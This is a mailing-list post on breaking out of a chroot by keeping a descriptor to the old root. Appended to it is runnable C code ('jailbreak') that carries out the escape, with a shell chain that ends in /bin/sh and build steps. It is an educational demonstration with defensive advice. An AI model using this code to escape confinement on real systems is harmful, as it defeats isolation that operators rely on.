switch_root and mount move

Laurent Bercot ska-dietlibc at skarnet.org
Wed May 2 23:13:14 UTC 2012


> As I understood from your own description in switch_root.c, you are
> calling chdir("/") to prevent such an ability.
> Can an attacker break out from this chroot (applet called from bash,
> not a chroot() system call in a C program)?

 Same thing. If you can do it in C, you can do it in shell.
 It takes a few lines of C code to write the following programs:

 * "opendir fd dir remainder" performs an opendir() system call on dir,
   assigns the result to the fd file descriptor, and execs into remainder.
 * "fchrootdir fd remainder" performs fchdir(fd), close(fd), chroot(".")
   and execs into remainder.
 Then breaking out of a chroot is a breeze:
 Say A is the script that runs under a chroot. Instead of writing
"chroot /newroot A", you write "opendir 3 / chroot /newroot fchrootdir 3 A"
and A will execute under the old root, despite the chroot command.

-- 
 Laurent
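The two tools and the chain Laurent describes, as an added example that is not code from the mail, from skarnet or from busybox: one C file that acts as "opendir" or "fchrootdir" when given those subcommands (exec-chaining like the post's tools), and with no arguments runs the whole escape in-process and checks with stat(2) that the root changes and then changes back. The binary name `jailbreak`, descriptor number 3 and the temporary jail under /tmp are assumptions for illustration; open(2) with O_DIRECTORY stands in for the opendir() the post names, because a plain descriptor is what has to survive the exec. Linux only.

```c
/* Added example, not from the mail, skarnet or busybox: the post's two tools
 * ("opendir fd dir ..." and "fchrootdir fd ...") in one binary, plus an
 * in-process run of the escape verified with stat(2).  Linux only; the
 * escape needs CAP_SYS_CHROOT, exactly like the chroot it undoes. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* "opendir fd dir": open dir and park it on descriptor fd.  No O_CLOEXEC,
 * so it survives every exec in the chain, the chroot command's included. */
static int open_dir_as(const char *dir, int fd)
{
    int d = open(dir, O_RDONLY | O_DIRECTORY);
    if (d < 0)
        return -1;
    if (d == fd)
        return 0;
    if (dup2(d, fd) < 0) {          /* dup2 also clears FD_CLOEXEC */
        close(d);
        return -1;
    }
    close(d);
    return 0;
}

/* "fchrootdir fd": fchdir(fd), close(fd), chroot(".").  fchdir() may land
 * outside the current root; chroot(".") then makes that directory the root. */
static int fchrootdir(int fd)
{
    if (fchdir(fd) < 0)
        return -1;
    close(fd);
    return chroot(".");
}

static int same_dir(const struct stat *a, const struct stat *b)
{
    return a->st_dev == b->st_dev && a->st_ino == b->st_ino;
}

/* Whole escape in one process, root identity compared by (st_dev, st_ino):
 *   1  jail entered and left again, "/" is the original root
 *   2  chroot(2) refused (no CAP_SYS_CHROOT), nothing to test
 *   0  jail entered but the escape failed: the process is now stuck inside
 *  -1  setup error */
int chroot_escape_demo(void)
{
    struct stat orig, jailed, now;
    char newroot[] = "/tmp/newroot.XXXXXX";   /* constructed, empty jail */

    if (mkdtemp(newroot) == NULL || stat("/", &orig) < 0)
        return -1;

    /* 1. "opendir 3 /": keep a handle on the old root before entering. */
    if (open_dir_as("/", 3) < 0)
        return -1;

    /* 2. "chroot /newroot": chroot(2) plus the applet's chdir("/"). */
    if (chroot(newroot) < 0) {                /* EPERM without the capability */
        close(3);
        rmdir(newroot);
        return 2;
    }
    if (chdir("/") < 0 || stat("/", &jailed) < 0 || same_dir(&jailed, &orig))
        return -1;

    /* 3. "fchrootdir 3": walk back out through the saved descriptor. */
    if (fchrootdir(3) < 0 || stat("/", &now) < 0 || !same_dir(&now, &orig))
        return 0;

    rmdir(newroot);                           /* resolvable again: old root */
    return 1;
}

/* No arguments: run the in-process demo.  Otherwise act as one of the two
 * tools, so the post's chain becomes (that chroot is the ordinary command):
 *   ./jailbreak opendir 3 / chroot /newroot ./jailbreak fchrootdir 3 /bin/sh */
int main(int argc, char **argv)
{
    if (argc >= 5 && strcmp(argv[1], "opendir") == 0) {
        if (open_dir_as(argv[3], atoi(argv[2])) < 0) {
            perror("opendir");
            return 111;
        }
        execvp(argv[4], argv + 4);
        perror("execvp");
        return 111;
    }
    if (argc >= 4 && strcmp(argv[1], "fchrootdir") == 0) {
        if (fchrootdir(atoi(argv[2])) < 0) {
            perror("fchrootdir");
            return 111;
        }
        execvp(argv[3], argv + 3);
        perror("execvp");
        return 111;
    }
    int r = chroot_escape_demo();
    static const char *const msg[] = { "still jailed", "escaped", "chroot refused: run as root" };
    printf("%s\n", r < 0 ? "setup error" : msg[r]);
    return r > 0 ? 0 : 1;
}
```

Build with `cc -o jailbreak jailbreak.c` and run it as root: with no arguments it prints "escaped"; run as an ordinary user it prints "chroot refused" because chroot(2) itself is refused. The chain form needs the real chroot command in between, and the inherited descriptor 3 is what carries the old root across it. The practical point is that the applet's chdir("/") only resets the working directory; it cannot revoke a directory descriptor the process already holds, and the second chroot(".") needs CAP_SYS_CHROOT just as the first did, so chroot(2) confines nothing that still runs with that capability. Closing descriptors (or opening them O_CLOEXEC) before exec and dropping the capability are what actually matter.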

